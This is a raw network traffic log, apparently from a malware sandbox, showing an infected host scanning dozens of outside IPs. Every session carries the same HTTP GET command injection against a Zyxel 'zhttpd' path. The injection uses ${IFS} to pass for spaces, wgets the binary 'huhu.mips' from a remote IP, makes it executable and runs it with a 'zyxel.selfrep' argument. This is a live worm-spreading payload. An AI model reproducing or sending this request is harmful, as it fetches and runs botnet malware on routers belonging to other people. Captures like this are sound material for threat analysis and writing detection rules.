                                                        Feb 2, 2024 06:20:55.634287119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.1457058186.10.19.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634340048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.1439204212.143.158.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634371996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.144497612.239.202.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634407043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.143942466.10.42.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634442091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.1457852199.83.96.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634480953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.145257261.87.71.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634515047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.144777458.97.204.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634565115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.1460662206.199.45.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634588957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.1445286187.179.246.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634610891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.144125436.100.142.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634675980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.1460604168.133.107.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634694099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.1458042186.68.98.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634742022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.1460902144.177.99.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634777069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.146006292.162.202.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634810925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.144833658.110.126.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634841919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.145827890.226.2.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634865999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.143965499.57.250.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634917021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.146081860.247.165.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.634965897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.1442700110.128.150.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635015965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.1454104223.18.10.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635049105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.1440498173.137.117.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635077953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.1441452159.183.101.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635144949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.1432994107.176.167.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635162115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.1457068117.183.18.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635209084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.1434166165.5.189.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635242939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.1459790173.85.145.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635288954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.1447684134.113.241.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635337114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.1441174118.86.120.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635363102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.1442920110.138.142.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635391951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.1449270105.56.190.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635415077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.1444404153.43.38.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635452986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.1445204166.187.81.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635462999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.1448190120.63.108.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635516882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.144217285.13.109.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635560036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.1455044155.87.83.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635605097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.144512052.218.221.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635657072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.1437316107.215.40.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635684013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        993192.168.2.1444148209.16.111.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:55.635739088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.1446412113.231.123.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.651762962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.145058474.176.176.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.651828051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.1446248116.166.153.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.651880026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.146038879.92.0.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.651977062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.1452072113.4.130.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652010918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.143547880.176.150.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652060032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.1447924125.123.142.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652091026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.1448782106.137.160.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652151108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.1452778223.211.167.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652183056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.144263046.135.132.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652225018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.1435790204.4.157.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652252913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.14381922.119.249.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652301073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.1458640158.161.217.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652348042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.145883020.122.162.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652378082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.144544054.185.174.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652414083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.144487047.141.20.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652462959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.145669871.110.132.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652523994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.144907446.25.226.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652545929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.1453048137.57.190.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652597904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.144888473.242.23.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652614117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.1453700163.2.6.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652671099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.1441734139.114.170.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652704000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.144483838.205.208.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652755976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.1449418153.26.14.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.652798891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.1443314157.228.85.121443
                                                        TimestampBytes transferredDirectionData
